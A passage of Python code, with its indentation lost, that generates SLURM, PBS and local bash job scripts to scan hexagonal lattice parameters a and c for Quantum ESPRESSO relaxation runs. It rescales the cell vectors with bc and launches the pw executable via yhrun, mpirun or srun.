fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtracting range_a[2] / 2 drops the endpoint, which is actually the beginning of the next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# subtracting range_c[2] / 2 drops the endpoint, which is actually the beginning of the next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
# using scale in bc plus printf formatting ensures a number like '.123' is
# written as '0.123'; the leading 0 that bc omits by default is restored here
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write("done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a nor c is optimized
pass
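# summary of the four cases handled above:
#   na >= 2 and nc >= 2 : scan a and c on a 2D grid (relax-${a}-${c}.in)
#   na >= 2, nc < 2     : scan a only, c kept at c_in (relax-${a}.in)
#   na < 2,  nc >= 2    : scan c only, a kept at a_in (relax-${c}.in)
#   na < 2 and nc < 2   : nothing to scan, so no loop is written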
# gen pbs script
with open("relax-hexagonal-%d-%d.pbs" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtracting range_a[2] / 2 drops the endpoint, which is actually the beginning of the next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is skipped, since it is actually the beginning of the next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
# printf together with bc's scale setting ensures that numbers like '.123' are correctly
# written as '0.123'; the leading zero, which bc omits by default, is restored here
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write("done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a nor c is optimized
pass
# gen local bash script
with open("relax-hexagonal-%d-%d.sh" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is skipped, since it is actually the beginning of the next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is skipped, since it is actually the beginning of the next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
# printf together with bc's scale setting ensures that numbers like '.123' are correctly
# written as '0.123'; the leading zero, which bc omits by default, is restored here
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}-${c}.in | tee relax-${a}-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}.in | tee relax-${a}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${c}.in | tee relax-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# neither a nor c is optimized
pass
# gen cdcloud script
with open("relax-hexagonal-%d-%d.slurm_cd" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("#\n")
fout.write("export I_MPI_PMI_LIBRARY=/opt/gridview/slurm/lib/libpmi.so\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is skipped, since it is actually the beginning of the next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is skipped, since it is actually the beginning of the next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
# printf together with bc's scale setting ensures that numbers like '.123' are correctly
# written as '0.123'; the leading zero, which bc omits by default, is restored here
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write("done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
